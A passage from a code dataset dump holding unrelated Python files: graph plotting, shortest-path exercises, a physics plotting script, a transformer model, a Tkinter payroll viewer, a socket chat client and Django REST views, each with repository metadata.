self.parent.cmodule.document.save_pdf( sdialog.get_filename() )\n print( 'saved' )\n sdialog.destroy()\n else:\n dialog = Gtk.MessageDialog(self.parent, 0, Gtk.MessageType.QUESTION,\n Gtk.ButtonsType.YES_NO, \"Warning!\")\n dialog.format_secondary_text(\n \"Do you wish to overwrite this file?\")\n overwrite = dialog.run()\n if overwrite == Gtk.ResponseType.YES:\n self.parent.cmodule.document.save_pdf( sdialog.get_filename() )\n print( 'overwrite' )\n dialog.destroy()\n sdialog.destroy()\n","repo_name":"deviantfero/leastfun","sub_path":"leastfun/gui/graph_grid.py","file_name":"graph_grid.py","file_ext":"py","file_size_in_byte":8839,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"6513915039","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nG = nx.Graph()\nG.add_nodes_from([0,1,2])\nG.add_weighted_edges_from([[0, 1, 3.0], [1, 2, 7.5]])\nrandom_pos = nx.random_layout(G,seed=23) #This two lines to prevent the orientation change of the graph in result and initial state #This two lines to prevent the orientation change of the graph in result and initial state\nposition=nx.spring_layout(G,pos=random_pos)\nnx.draw_networkx_nodes(G,position,node_size=450)\nnx.draw_networkx_edges(G,position, edgelist=G.edges(),edge_color='black')\nprint(G.edges())\nweight=nx.get_edge_attributes(G,'weight')\nprint(weight)\nnx.draw_networkx_edge_labels(G,position,edge_labels=weight)\nnx.draw_networkx_labels(G,position)\nplt.show()","repo_name":"Abhishek0075/MinimumSpanningTree","sub_path":"important/importantTest1.py","file_name":"importantTest1.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28836839689","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nfrom collections import defaultdict\r\nimport heapq\r\n\r\nn, m, x = map(int, input().split())\r\ngraph = defaultdict(list)\r\nINF = float(\"inf\")\r\n\r\nfor _ in range(m):\r\n a, b, c = map(int, input().split())\r\n graph[a].append((c, b)) # (cost, destination)\r\n\r\n\r\ndef dijkstra(start):\r\n queue = []\r\n heapq.heappush(queue, (0, start)) # (cost, destination)\r\n distance[start] = 0\r\n\r\n while queue:\r\n dist, cur = heapq.heappop(queue)\r\n\r\n if dist > distance[cur]:\r\n continue # 현재 기록된 distance보다 크면 pass\r\n\r\n for w, nxt in graph[cur]:\r\n cost = dist + w\r\n if cost < distance[nxt]:\r\n distance[nxt] = cost\r\n heapq.heappush(queue, (cost, nxt))\r\n\r\n return \r\n\r\nret = [0] * (n + 1)\r\nfor i in range(1, n + 1):\r\n visited = [0] * (n + 1) # 매번 다익스트라 실행 때마다 visited, distance 초기화\r\n distance = [INF] * (n + 1)\r\n dijkstra(i) # i에서 다른 모든 점까지의 최단거리 구하기\r\n ret[i] += distance[x] # 우리가 원하는 것은 x노드 까지의 거리 (파티로 모일 장소)\r\n\r\nvisited = [0] * (n + 1)\r\ndistance = [INF] * (n + 1)\r\ndijkstra(x) # 파티가 끝나고 집으로 돌아가는 최단거리 구하기\r\nfor i in range(1, n + 1):\r\n ret[i] += distance[i] # 파티하러 오는데 걸릴 비용에 집으로 돌아가는 비용 더하기\r\n\r\nprint(max(ret))\r\n\r\n","repo_name":"gnlenfn/DailyProblemSolving","sub_path":"백준/Gold/1238. 
파티/파티.py","file_name":"파티.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74735599925","text":"from __future__ import division\nimport matplotlib\n\nfrom matplotlib import pyplot\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport labrad\n'''\nthis analyzes the tomography experiment on April 02, 2013 where we compare (a) tomography at the dephasing time with no dephasing\nand (b) tomography at the dephasing time after the dephasing. The results are the same, showing no coherence\n(as it must be due to frequency switching) and therefore we are dephasing in the right basis.\n'''\ntrials = 100\ndate = '2013Apr02'\n#before dephasing\n#folders = ['2258_22','2258_28','2258_34','2258_41','2258_47','2258_53','2258_59','2259_06','2259_12','2259_18']\n#after dephasing\nfolders = ['2259_58','2300_04','2300_10','2300_16','2300_23','2300_29','2300_35','2301_25','2301_31','2301_37']\nresults = np.zeros((len(folders), 3))\ncxn = labrad.connect()\ndv = cxn.data_vault\nfor i,folder in enumerate(folders):\n dv.cd(['', 'Experiments','RamseyDephaseTomography', date, folder])\n dv.open(1)\n measurement = dv.get().asarray\n results[i] = measurement.transpose()[1]\np1,p2,p3 = np.average(results, axis = 0)\n\nz = p1\ny = p2 - 1/2\nx = 1/2 - p3\n\ndensity_matrx = np.array([[z, x + 1j*y],[x - 1j*y, 1 - z]])\n\nabsol=np.abs(density_matrx)\nfig = pyplot.figure()\n\nlabels = [r'$|e\\rangle$',r'$|g\\rangle$']\n#first plot\nax = fig.add_subplot(111, projection = '3d')\n\n\n\nax.set_zticks((0.0,0.5,1.0))\nax.set_zticklabels([0,0.5,1], fontsize = 22)\n#ax.tick_params(axis='z', labelsize=22)\n#cl = pyplot.getp(cax, 'ymajorticklabels') \n#pyplot.setp(cl, fontsize=22)\n#next subplot\n#ax = fig.add_subplot(122, projection = '3d')\n#ax.set_title('Imaginary', fontsize = 30)\n#q.matrix_histogram(imag, limits = zlim, fig = fig, ax = ax, colorbar = False)\n#ax.set_xticklabels(labels, fontsize = 22)\n#ax.set_yticklabels(labels, fontsize = 22)\n#ax.tick_params(axis='z', labelsize=22)\n#cax, kw = matplotlib.colorbar.make_axes(ax, shrink=.75, pad=.0)\n#cb1 = matplotlib.colorbar.ColorbarBase(cax, norm = norm)\n#cl = pyplot.getp(cax, 'ymajorticklabels') \n#pyplot.setp(cl, fontsize=22)\n\n\n#ax = fig.add_subplot(133)\n#ax.get_xaxis().set_visible(False)\n#ax.get_yaxis().set_visible(False)\n\n#def errorBarSimple(trials, prob):\n# #look at wiki http://en.wikipedia.org/wiki/Checking_whether_a_coin_is_fair\n# '''returns 1 sigma error bar on each side i.e 1 sigma interval is val - err < val + err'''\n# Z = 1.0\n# s = np.sqrt(prob * (1.0 - prob) / float(trials))\n# err = Z * s\n# return err\n#\n#err = errorBarSimple\n#\n#\n#error_matrix = np.array(\n# [\n# [err(trials, p1), err(trials,p3) + 1.j * err(trials, p2)],\n# [err(trials,p3) - 1.j * err(trials,p2), err(trials,p1)]\n# ]\n# )\n#error_matrix = np.round(error_matrix, 2)\n\n#ax.annotate(\"Measurement\", xy=(0.2, 0.8), fontsize = 20, xycoords=\"axes fraction\")\n#ax.annotate(density_matrx, xy=(0.2, 0.7), fontsize = 20, xycoords=\"axes fraction\")\n#ax.annotate(\" 'Error Bar' \", xy=(0.2, 0.6), fontsize = 20, xycoords=\"axes fraction\")\n#ax.annotate(error_matrix, xy=(0.2, 0.5), fontsize = 20, xycoords=\"axes fraction\")\n\nxpos, ypos = np.meshgrid(np.arange(2), np.arange(2))\nxpos = 0.5 * xpos.flatten()\nypos = 0.5 * ypos.flatten()\nzpos = np.zeros(4)\ndx = 0.4 * np.ones_like(zpos)\ndy = dx.copy()\ndz = absol.flatten()\n\nax.bar3d(xpos, ypos, zpos, dx, dy, dz, 
color='#FFCC00', zsort='average')\nax.set_xticklabels(labels, fontsize = 30)\nax.set_yticklabels(labels, fontsize = 30)\nax.xaxis.set_ticks([0.25,0.75])\nax.yaxis.set_ticks([0.25,0.75])\nax.disable_mouse_rotation()\n#ax.grid(True, linestyle = '--', fillstyle = None)\n#ax.set_xlim([0,2])\n#ax.set_ylim([0,2])\nax.set_zlim([0,1])\nax.view_init(35, 315)\npyplot.savefig('denisty_matrix.pdf')\npyplot.show()\n","repo_name":"HaeffnerLab/cct","sub_path":"old_scripts/dataAnalysis/General_plots_for_presentation_etc/Local_detection_experiment/tomography_plot_publication.py","file_name":"tomography_plot_publication.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"} +{"seq_id":"20358311936","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom transformer import TransformerEncoder, TransformerDecoder\nfrom torch import Tensor\nfrom positional_embedding import *\n\n\nclass Transformer_Encoder_cls(nn.Module):\n def __init__(self, num_layers=8, norm=None, d_model=512, \n nhead=8, dim_feedforward=2048, dropout=0.1,\n drop_path=0.4, activation=\"relu\", \n normalize_before=True, num_cls=18) -> None:\n super().__init__()\n self.encoder = TransformerEncoder(num_layers, norm, d_model, \n nhead, dim_feedforward, dropout, \n drop_path, activation, \n normalize_before)\n self.classify_head = nn.Sequential(\n nn.Linear(d_model, 2 * d_model),\n nn.ReLU(inplace=True),\n nn.Linear(2 * d_model, num_cls)\n )\n \n self.pos_embed = PositionEmbeddingSine(d_model)\n \n def forward(self, src: Tensor, src_mask: Tensor = None) -> Tensor:\n # src: (B, N, C)\n # src_mask: (B, N)\n pos = self.pos_embed(src)\n src = self.encoder(src, src_mask, pos=pos)\n src = self.classify_head(src)\n return src\n\n\ndef build_Transformer_Encoder(num_layers=8, norm=None, d_model=3, \n nhead=8, dim_feedforward=2048, dropout=0.1,\n drop_path=0.4, activation=\"relu\", \n normalize_before=True, num_cls=18):\n \n return Transformer_Encoder_cls(num_layers, norm, d_model, nhead, \n dim_feedforward, dropout, drop_path, activation, \n normalize_before, num_cls)\n ","repo_name":"Chaoyi-He1/HSI","sub_path":"Pixel_MLP/src/transformer_model.py","file_name":"transformer_model.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"73388939125","text":"\"\"\"\nGiven a non-empty array of integers, every element appears twice except for one. Find that single one.\n\nExample:\nInput: [2,2,1]\nOutput: 1\n\"\"\"\n\ndef singleNumber(nums):\n result = 0\n for num in nums:\n result ^= num\n return result\n\nnums = [1,2,2]\n\nprint(singleNumber(nums))","repo_name":"Dipankar-Medhi/DSA-with-Python","sub_path":"Bitwise/single_number.py","file_name":"single_number.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16883001553","text":"import os\nimport ants\nimport antspynet\n\nfrom .. import shared\nfrom . 
import RAVERuntimeException\n\ndef pipeline_target_brain_mask(image_resampled, transforms, debug):\n try:\n brain_mask = ants.apply_transforms(\n fixed = image_resampled,\n moving = transforms['brain_mask'],\n transformlist=transforms['template_transforms']['invtransforms'],\n whichtoinvert = [True], interpolator=\"linear\", verbose = True)\n if debug:\n brain_mask.plot(black_bg=False, nslices=12, ncol=4)\n return brain_mask\n except Exception as e:\n return RAVERuntimeException(e)\n\n\n","repo_name":"rave-ieeg/rave-pipelines","sub_path":"modules/ants_preprocessing/py/ants_preprocessing/rave_pipeline_adapters/pipeline_target_brain_mask.py","file_name":"pipeline_target_brain_mask.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3204445635","text":"from collections import deque\r\n\r\nn = 6\r\n\r\nedge = [[3, 6], [4, 3], [3, 2], [1, 3], [1, 2], [2, 4], [5, 2]]\r\n\r\ndef solution(n, edge):\r\n ary = [[] for _ in range(n + 1)]\r\n visit = [0 for _ in range(n + 1)]\r\n que = deque([])\r\n \r\n for link in edge :\r\n ary[link[0]].append(link[1])\r\n ary[link[1]].append(link[0])\r\n\r\n visit[1] = 1\r\n for node in ary[1] :\r\n que.appendleft([node, 0])\r\n visit[node] = 1\r\n\r\n max_depth = 0\r\n cnt = 1\r\n\r\n while True :\r\n flag = 0\r\n nbr, depth = que.pop()\r\n\r\n for node in ary[nbr] :\r\n if visit[node] != 1 :\r\n que.appendleft([node, depth + 1])\r\n visit[node] = 1\r\n flag = 1\r\n\r\n if flag == 0 :\r\n if max_depth == depth :\r\n cnt += 1\r\n elif max_depth < depth :\r\n max_depth = depth\r\n cnt = 1\r\n\r\n if not que :\r\n break\r\n \r\n return cnt\r\n\r\nprint(solution(n, edge))","repo_name":"chosaihim/jungle_codingTest_study","sub_path":"JAN/25th/영후_가장먼노드.py","file_name":"영후_가장먼노드.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"631509049","text":"# coding:utf-8\r\n# UNIVERSIDADE FEDERAL DO RIO GRANDE DO NORTE\r\n# DEPARTAMENTO DE ENGENHARIA DE COMPUTACAO E AUTOMACAO\r\n# DISCIPLINA REDES DE COMPUTADORES (DCA0113)\r\n# AUTOR: PROF. 
CARLOS M D VIEGAS (viegas 'at' dca.ufrn.br)\r\n#\r\n# SCRIPT: Cliente de sockets TCP modificado para enviar texto minusculo ao servidor e aguardar resposta em maiuscula\r\n#\r\n\r\n# importacao das bibliotecas\r\nfrom socket import *\r\nfrom threading import Thread\r\nfrom queue import Queue\r\n\r\n\r\nclass Servidor(Thread):\r\n def __init__(self, socket, nome_fila, priv):\r\n Thread.__init__(self)\r\n self.socket = socket\r\n self.nome_fila = nome_fila\r\n self.priv = priv\r\n\r\n def run(self):\r\n # ------------------- ESCUTA SERVER -----------------------\r\n while True:\r\n try:\r\n # Recebe 1º byte do cliente - tamanho mensagem\r\n tamanho_msg = int.from_bytes(clientSocket.recv(1), byteorder=\"big\")\r\n\r\n if tamanho_msg > 0:\r\n # Obtem endereços IP destino e do remetente\r\n enderecos = self.socket.recv(8)\r\n origem = list(map(int, enderecos[0:4]))\r\n destino = list(map(int, enderecos[4:8]))\r\n\r\n # Obtem nick de destino\r\n nick = self.socket.recv(6).decode(\"utf-8\").replace(\"0\", \"\")\r\n\r\n # Obtem codigo do comando\r\n comando = int.from_bytes(self.socket.recv(1), byteorder=\"big\")\r\n\r\n # Obem mensagem enviada (tamanho_msg - tamanho cabaçalho [24] bytes)\r\n tamanho_msg -= 16\r\n if tamanho_msg <= 40:\r\n mensagem = self.socket.recv(tamanho_msg).decode(\"utf-8\")\r\n\r\n # SAIR\r\n if comando == 0: # sair()\r\n f = bytes([16, 192, 168, 0, 1, 10, 0, 0, 1]) # Insere n�meros no vetor de bytes\r\n f += \":\".encode(\"utf-8\") * (6 - len(\"all\")) + \"all\".encode(\r\n \"utf-8\") # insere o nick no vetor de bytes, preenchendo com 0 a esqueda para que preencha os 8 octetos\r\n\r\n f += bytes([11])\r\n # print(f)\r\n self.socket.send(f)\r\n\r\n self.socket.close()\r\n print(\"Servidor desconectado. Pressione enter para sair\")\r\n break\r\n\r\n # APENAS IMPRIMIR DADOS RECEBIDOS\r\n # 2 - falar\r\n # 3 - listar\r\n # 6 - Requerir novo nick\r\n # 8 - confirmar privado\r\n elif comando == 2:\r\n print(mensagem)\r\n\r\n elif comando == 9:\r\n print(mensagem + \" recusou o pedido\")\r\n self.nome_fila.put(\"\")\r\n elif comando == 5:\r\n print(\"Você saiu do privado\")\r\n self.nome_fila.put(\"\")\r\n priv.put(False)\r\n elif comando == 4:\r\n print(\"Deseja falar privado com \" + mensagem + \" ?\")\r\n self.nome_fila.put(mensagem)\r\n elif comando == 8:\r\n priv.put(True)\r\n print(mensagem)\r\n\r\n else:\r\n mensagem = self.socket.recv(40).decode(\"utf-8\")\r\n print(mensagem, end=\"\")\r\n\r\n # 2 - falar,\r\n # 3 - listar,\r\n # 4 - requisitar privado,\r\n # 1 - entrando,\r\n # 5 - sair privado,\r\n # 6 - mudar nick\r\n # 8 - confirma privado,\r\n # 7 - Eliminar cliente\r\n # 9 - recusar privado\r\n\r\n\r\n # Exceção para se server sair do nada\r\n except ConnectionResetError:\r\n break\r\n # Exceção para se server sair do nada\r\n except (ConnectionAbortedError, OSError):\r\n print(\"Fim do chat\") \r\n break\r\n\r\ntry:\r\n # ---------------------- definicao das variaveis ------------------------\r\n # Sempre digite em IP\r\n serverName = \"localhost\"#'177.89.236.221'\r\n if serverName != \"localhost\":\r\n host = list(map(int, serverName.split(\".\")))\r\n else:\r\n host = [127, 0, 0, 1]\r\n\r\n serverPort = 14000\r\n clientSocket = socket(AF_INET, SOCK_STREAM) # criacao do socket TCP\r\n clientSocket.connect((serverName, serverPort)) # conecta o socket ao servidor\r\n cliente = gethostbyname(gethostname())\r\n\r\n nome = Queue()\r\n priv = Queue()\r\n\r\n #--------------Entrando no servidor ----------------------------------\r\n # Insere números no vetor de 
bytes\r\n f = bytes([16] + host + list(map(int, cliente.split(\".\"))))\r\n # insere o nick no vetor de bytes, preenchendo com 0 a esquerda para que preencha os 6 bytes\r\n f += \":\".encode(\"utf-8\") * (6 - len(\"all\")) + \"all\".encode(\"utf-8\")\r\n # insere comando\r\n f += bytes([1])\r\n clientSocket.send(f)\r\n #--------------Entrando no servidor ----------------------------------\r\n\r\n server = Servidor(clientSocket, nome, priv)\r\n server.start()\r\n\r\n print(\"Chat iniciado\")\r\n\r\n pediu_privado = \"\"\r\n privado = False\r\n\r\n #------------- ENVIA PARA SERVER -------------------------------------\r\n while True:\r\n\r\n\r\n sentence = input(\"> \")\r\n\r\n if not priv.empty():\r\n privado = priv.get()\r\n\r\n\r\n if server.is_alive():\r\n if sentence == \"sair()\":\r\n comando = 0\r\n # Insere n�meros no vetor de bytes\r\n f = bytes([16, 192, 168, 0, 1, 10, 0, 0, 1])\r\n # insere o nick no vetor de bytes, preenchendo com 0 a esqueda para que preencha os 6 bytes (octetos)\r\n f += \":\".encode(\"utf-8\") * (6 - len(\"all\")) + \"all\".encode(\r\n \"utf-8\")\r\n f += bytes([0])\r\n clientSocket.send(f)\r\n\r\n clientSocket.shutdown(SHUT_RDWR)\r\n clientSocket.close()\r\n break\r\n\r\n elif sentence.startswith(\"nome(\") and sentence.endswith(\")\"):\r\n #Remove \"nome(\" e o último caractere \")\"\r\n sentence = sentence[5:]\r\n sentence = sentence[0:-1] #para retira o \")\"\r\n\r\n if len(sentence) <= 6 and len(sentence) > 0 and sentence != \"nome()\" and \":\" not in sentence:\r\n comando = 6\r\n else:\r\n print(\"Nome inválido\")\r\n continue\r\n\r\n elif sentence == \"listar()\":\r\n comando = 3\r\n\r\n elif sentence.startswith(\"privado(\") and sentence.endswith(\")\"):\r\n comando = 4\r\n sentence = sentence[8:]\r\n sentence = sentence[0:-1] # para retira o \")\"\r\n pediu_privado = sentence\r\n\r\n elif sentence == \"confirmar\":\r\n comando = 8\r\n sentence = nome.get()\r\n pediu_privado = sentence\r\n privado = True\r\n\r\n elif sentence == \"negar\" and len(pediu_privado) > 0:\r\n comando = 9\r\n sentence = pediu_privado\r\n pediu_privado = \"\"\r\n privado = False\r\n\r\n elif sentence == \"sair_privado()\" and len(pediu_privado) > 0:\r\n comando = 5\r\n sentence = pediu_privado\r\n pediu_privado = \"\"\r\n privado = False\r\n\r\n else:\r\n comando = 2\r\n\r\n\r\n sentence = sentence.encode(\"utf-8\")\r\n f = bytes([len(sentence) + 16, 192, 168, 0, 1, 10, 0, 0, 1]) # Insere n�meros no vetor de bytes\r\n\r\n if not privado:\r\n f += \":\".encode(\"utf-8\") * (6 - len(\"all\")) + \"all\".encode(\r\n \"utf-8\") # insere o nick no vetor de bytes, preenchendo com 0 a esqueda para que preencha os 8 octetos\r\n else:\r\n f += \":\".encode(\"utf-8\") * (6 - len(pediu_privado)) + pediu_privado.encode(\r\n \"utf-8\")\r\n\r\n f += bytes([comando]) + sentence\r\n\r\n # print(f)\r\n clientSocket.send(f)\r\n else:\r\n break\r\n\r\n # encerramento o socket do cliente\r\nexcept ConnectionRefusedError:\r\n print(\"Servidor está desconectado\")\r\n\r\n","repo_name":"lucaslyon96/projeto-redes","sub_path":"cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":8612,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35048765227","text":"from contextlib import contextmanager\n\nfrom sqlalchemy import (\n NUMERIC,\n VARCHAR,\n DateTime,\n create_engine,\n delete,\n insert,\n select,\n update,\n)\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, 
sessionmaker\nfrom sqlalchemy.orm.session import Session\n\nengine = create_engine(\n \"postgresql://postgres:postgres@dhost:5432/postgres\",\n convert_unicode=False,\n pool_size=5,\n pool_recycle=500,\n max_overflow=5,\n echo=True,\n)\nget_session = scoped_session(\n sessionmaker(autocommit=False, autoflush=False, bind=engine)\n)\nBase = declarative_base()\nBase.query = get_session.query_property()\nBase.metadata.create_all(engine)\n\nfrom datetime import datetime\n\nfrom sqlalchemy.sql.schema import Column\n\n\n@contextmanager\ndef get_scoped_session():\n session = get_session()\n try:\n yield session\n session.commit()\n except:\n session.rollback()\n raise\n finally:\n session.close()\n\n\nclass Test(Base):\n __tablename__ = \"test\"\n id = Column(NUMERIC, primary_key=True)\n name = Column(VARCHAR, nullable=True)\n created = Column(DateTime, nullable=True, default=datetime.now)\n\n def __str__(self):\n return \"\".join([f\"{key}={val}, \" for key, val in self.__dict__.items()])\n\n\ndef run():\n with get_scoped_session() as session:\n session: Session\n\n max_id = session.execute(\"select COALESCE(max(id), 0) from test\").scalar()\n print(f\"max: {max_id}\")\n\n session.execute(\n insert(Test).values(\n id=max_id + 1, name=f\"test{max_id+1}\", created=datetime.now()\n )\n )\n\n # raise RuntimeError\n\n session.execute(update(Test).where(Test.id == 1).values(created=datetime.now()))\n # session.execute(\"update test set created = now() where id = 1\")\n\n result = session.execute(select(Test).where(Test.id == \"01\"))\n print(result)\n\n result = session.query(Test).filter_by(id=1).first()\n print(result.name)\n\n result = session.query(Test).all()\n for test in result:\n print(test)\n\n # session.execute(delete(Test))\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"dgdsingen/test","sub_path":"python/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19111725643","text":"'''employee payroll'''\nimport tkinter as tk\nimport tkinter.font as tkfont\nfrom tkinter import ttk\nimport cx_Oracle as oracle\nimport os\n\ndef create_connection():\n global conn,c\n conn = oracle.connect(user=\"payroll\", password=\"password\",dsn=\"localhost/xepdb1\")\n c = conn.cursor()\n\ndef close_connection():\n global conn,c\n c.close()\n conn.close()\n\ndef create_table_GUI(main,text,columns,width,double_click):\n fr_table = tk.Frame(main,width=500,height=50)\n fr_table.pack(side='top',anchor='center')\n global table\n table = ttk.Treeview(fr_table)\n table['columns'] = columns\n for i in columns:\n table.heading(i,text=i,anchor='center') \n table.column(\"#0\",width=0,stretch='no')\n for i in range(0,len(columns)):\n table.column(columns[i],anchor='center',width=width[i])\n style = ttk.Style()\n style.configure(\"Treeview\",rowheight=35, font=('Times New Roman', 18))\n style.configure(\"Treeview.Heading\",font=('Times New Roman', 18,'bold'))\n table.tag_configure('odd', background='#DFDFDF')\n if(double_click):\n table.bind(\"\",emp_payroll)\n else:\n pass\n table.pack(side='top',anchor=tk.CENTER)\n return table\n\ndef employee_payroll(selected_row_values,month,year):\n emp_payroll_window = tk.Tk()\n emp_payroll_window.title(\"Employee Payroll | Employee Payroll Management System\")\n heading = tkfont.Font(family=\"Times New Roman\", size=20,weight='bold')\n text = tkfont.Font(family=\"Times New Roman\", size=16)\n text2= tkfont.Font(family=\"Times New Roman\", 
size=16,weight='bold')\n tk.Label(emp_payroll_window,text = \"EMPLOYEE'S PAYROLL\",font=heading).pack(side='top',anchor='n')\n fr_emp_details = tk.Frame(emp_payroll_window,width=750,height=150)\n fr_emp_details.pack(side='top',anchor='n')\n create_connection()\n data = '''SELECT\n e.emp_id,\n d.dept_name,\n p.pos_name\n FROM\n employee e\n LEFT JOIN\n department d\n ON\n e.dept_id = d.dept_id\n LEFT JOIN\n positions p\n ON\n e.dept_id = p.pos_id\n WHERE\n e.emp_id = :1'''\n data = c.execute(data, selected_row_values[0])\n data = data.fetchall()\n tk.Label(fr_emp_details,text = \"ID:\",font=text).place(x=0, y=10, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = selected_row_values[0],font=text).place(x=20, y=10, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = \"Name:\",font=text).place(x=0, y=50, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = selected_row_values[1],font=text).place(x=45, y=50, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = \"Department:\",font=text).place(x=410, y=10, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = data[0][1],font=text).place(x=490, y=10, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = \"Position:\",font=text).place(x=410, y=50, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = data[0][2],font=text).place(x=470, y=50, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = \"Month:\",font=text).place(x=0, y=90, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = month ,font=text).place(x=45, y=90, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = \"Year:\",font=text).place(x=410, y=90, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = year ,font=text).place(x=445, y=90, relx=0.01, rely=0.01)\n sql = '''SELECT\n *\n FROM\n emp_allowances\n WHERE\n emp_id = :a\n AND\n month_ = :b\n AND\n year_ = :c'''\n result = c.execute(sql, a=selected_row_values[0],b=month, c=year)\n result = result.fetchall()\n if(result==[]):\n tk.Label(emp_payroll_window,text='TOTAL ALLOWANCES: Rs. 0',font=text).pack(side='top',anchor='n')\n else:\n columns = ('Allowance Name','Amount')\n width = [300,190]\n allowances_table = create_table_GUI(emp_payroll_window,text,columns,width,False)\n for i in range(len(result)):\n if(i%2!=0):\n allowances_table.insert(parent='', index='end', iid=i, text=\"Label\", values=(result[i][4],result[i][5]),tag = 'odd')\n else:\n allowances_table.insert(parent='', index='end', iid=i, text=\"Label\", values=(result[i][4],result[i][5]))\n sql = '''SELECT\n SUM(amount) as total\n FROM\n emp_allowances\n WHERE\n emp_id = :a\n AND\n month_ = :b\n AND\n year_ = :c'''\n result = c.execute(sql, a=selected_row_values[0],b=month, c=year)\n result = result.fetchall()\n total_allowances = result[0][0]\n fr_total = tk.Frame(emp_payroll_window,width=500,height=30)\n fr_total.pack(side='top',anchor='n')\n tk.Label(fr_total,text='TOTAL ALLOWANCES: Rs. ',font=text2).place(x=160,y=10)\n tk.Label(fr_total,text= total_allowances,font=text2).place(x=325,y=10) \n sql = '''SELECT\n *\n FROM\n emp_deductions\n WHERE\n emp_id = :a\n AND\n month_ = :b\n AND\n year_ = :c '''\n result = c.execute(sql, a=selected_row_values[0], b=month, c=year)\n result = result.fetchall()\n if(result==[]):\n tk.Label(emp_payroll_window,text='TOTAL DEDUCTIONS: Rs. 
0',font=text).pack(side='top',anchor='n')\n else:\n columns = ('Deduction Name','Amount')\n width = [300,190]\n deduction_table = create_table_GUI(emp_payroll_window,text,columns,width,False)\n for i in range(len(result)):\n if(i%2!=0):\n deduction_table.insert(parent='', index='end', iid=i, text=\"Label\", values=(result[i][4],result[i][5]),tag = 'odd')\n else:\n deduction_table.insert(parent='', index='end', iid=i, text=\"Label\", values=(result[i][4],result[i][5]))\n sql = '''SELECT\n SUM(amount) as total\n FROM\n emp_deductions\n WHERE\n emp_id = :a\n AND\n month_ = :b\n AND\n year_ = :c'''\n result = c.execute(sql, a=selected_row_values[0],b=month, c=year)\n result = result.fetchall()\n total_allowances = result[0][0]\n fr_total = tk.Frame(emp_payroll_window,width=500,height=30)\n fr_total.pack(side='top',anchor='n')\n tk.Label(fr_total,text='TOTAL DEDUCITONS: Rs. ',font=text2).place(x=158,y=10)\n tk.Label(fr_total,text= total_allowances,font=text2).place(x=320,y=10)\n tk.Label(emp_payroll_window,text= 'NET SALARY: Rs. '+selected_row_values[5],font=text2).pack(side='top',anchor='n')\n close_connection()\n emp_payroll_window.mainloop()\n\n","repo_name":"HariChandana27/Employee-Payroll-Management-System","sub_path":"emp_payroll.py","file_name":"emp_payroll.py","file_ext":"py","file_size_in_byte":7298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"72755180402","text":"from django.shortcuts import render\nfrom rest_framework import viewsets\nfrom .models import (\n Item, Scale, Inventory, Question, \n Response as ItemResponse, Norm, Sample, Result, Progress\n)\nfrom .serializers import (\n ScaleSerializer, InventorySerializer, \n ItemSerializer, QuestionSerializer, \n ResponseSerializer, NormSerializer, \n SampleSerializer, ResultSerializer, ResultRequestSerializer\n)\nfrom django.http import Http404\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .mixins import CreateListMixin\n# from django.db.models import Q\n\n\nclass ScaleView(viewsets.ModelViewSet):\n queryset = Scale.objects.all()\n serializer_class = ScaleSerializer\n\n\nclass InventoryView(viewsets.ModelViewSet):\n serializer_class = InventorySerializer\n\n def get_queryset(self):\n user = self.request.user\n progress = self.request.query_params.get(\"progress\")\n if progress == \"all\":\n inventories = Inventory.objects.all()\n elif progress == \"done\":\n inventories = Inventory.objects.filter(progress__user=user)\n else: \n inventories = Inventory.objects.exclude(progress__user=user)\n return inventories\n\n \n def get_serializer_context(self):\n user = self.request.user\n return {'user': user}\n\n\nclass ItemView(viewsets.ModelViewSet):\n queryset = Item.objects.all()\n serializer_class = ItemSerializer\n\n\nclass QuestionView(viewsets.ModelViewSet):\n queryset = Question.objects.all()\n serializer_class = QuestionSerializer\n\n\nclass ResponseView(CreateListMixin, viewsets.ModelViewSet):\n serializer_class = ResponseSerializer\n\n def get_queryset(self):\n user = self.request.user\n return ItemResponse.objects.filter(user=user)\n\n\nclass NormView(viewsets.ModelViewSet):\n queryset = Norm.objects.all()\n serializer_class = NormSerializer\n\n\nclass SampleView(viewsets.ModelViewSet):\n 